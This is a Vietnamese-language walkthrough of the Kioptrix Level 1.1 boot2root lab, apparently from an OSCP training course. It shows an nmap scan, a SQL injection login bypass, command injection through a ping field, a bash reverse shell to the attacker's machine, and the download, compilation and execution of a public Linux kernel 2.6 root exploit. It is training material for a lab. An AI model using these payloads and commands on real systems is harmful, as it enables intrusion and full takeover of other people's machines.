Hack The Kioptrix Level-1.1 (Boot2Root Challenge)

Ta đã thực hành hack Kioptrix 1 qua lỗi của dịch vụ samba, giờ hãy nâng cao hơn chút với Level 1.1

Tải image ở đây và chạy trong VM.

Bắt đầu ! Chạy lab với Kali Linux 2019.1

Trong bài 1 ta đã dùng netdiscover, bài thi OSCP là bài thi hack bằng Kali Linxu nên các bạn cứ thoải mái dùng các tool hay command tại đây, miễn là không phạm quy chế thi 🙂 Chú ý IP của máy ảo như 192.168.1.111

Tiếp theo quét với nmap, có lẽ nên thêm vào -sS -A

#nmap -A 192.168.1.111

Ở đây không có 139 nghĩ là samba không hoạt động, nếu có thì bổn cũ soạn lại ! Nhưng có port 80 khá hấp dẫn và thử mở trang web xem sao, rồi nikto hay whatweb “loạn” cả lên.

URL: http://192.168.1.111

Ở đây ta có 1 form đăng nhập, với các form dạng này thì nhiều ý tưởng xuất hiện như tấn công SQL injection, bruteforce hay xem source code. Đâu tiên là thử một lỗi thuộc hàng Top 1 OWASP / SQL injection như hình sau .

  • Lưu ý : Hãy copy sẳn các lệnh khai thác SQLi thông dụng trong sổ ghi chú để lấy ra xài cho nhanh.

Username: 1′ or ‘1’
Password: 1′ or ‘1’

Có vẽ thành công, ta thấy 1 trang quản trị khá sơ sài, trong đó có 1 ô chạy lệnh , ý nghĩ command injection nên “lóe” lên trong đầu các bạn khi thấy các ô này, và XSS cũng là một hướng cần ghi nhớ. Ở đây thì chèn lệnh khá hợp lý do có thông tin ô này chạy lệnh ping, nếu có lỗi nhiều khi nó cho ta chạy cả lệnh shutdown không chừng

trong danh sách nhưng cú pháp khai thác command injection các bạn nên lưu trữ thật đầy đủ. Có vẽ như ta cần rèn luyện qua một lớp OWASP Web Hacking để vững vàng hơn, mặc dù nhiều người thấy việc khai thác này không có gì quá khó khăn nhưng đối với những ai mới bắt đầu thì hơi khoai. Hãy nhập vào ;id command để enumerate UID & GID của tài khoản đăng nhập. Các bạn nên tìm giải pháp chạy lệnh để xem tập tin password xem có được không.

Kết quả là dump UID và GID của tài khoản apache chứng tỏ hệ thống bị lỗi command Injection.

Hãy nhớ lại các bài học đầu tiên của giáo trình PWK trong lớp OSCP VN để mở 1 kết nối ngược netcat để lấy victim shell của Kioptrix như lệnh sau :

127.0.0.1; bash -i >& /dev/tcp/192.168.1.107/8888 0>&1

Trên cửa sổ netcat đang chờ đợi các bạn có thể thấy 1 session được trả về (chạy nc -lvp 8888)

id
uname -a

Trên màn hình hiển thi các bạn thấy thông tin Linux kernel 2.6 , hãy Google xem có lỗi nào liên quan hay có mã khai thác nào có thể leo thang hay không ? Và các bạn sẽ thấy thông tin như “Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit” và mã khai thác 9542 để tiền hành privilege escalation.

Với trình OSCP thì ắt hẳn các bạn biết nên vào tmp để tải về mã khai thác và biên dịch rồi chạy …

cd /tmp
wget https://www.exploit-db.com/download/9542 –no-check-certificate
mv 9542 shell.c
gcc shell.c
./a.out
id
whoami

Và ta đã thấy mặt trời trong tim em …

OSCP VN Online Course

Hãy thực hành bài này vài lần và suy nghĩ “mông lung”, ghi nhớ các bước. Đừng đọc, hãy hack !

Comments